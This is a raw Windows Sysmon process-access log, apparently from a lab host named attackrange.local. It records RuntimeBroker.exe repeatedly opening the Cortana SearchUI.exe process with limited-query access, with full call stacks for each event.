13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
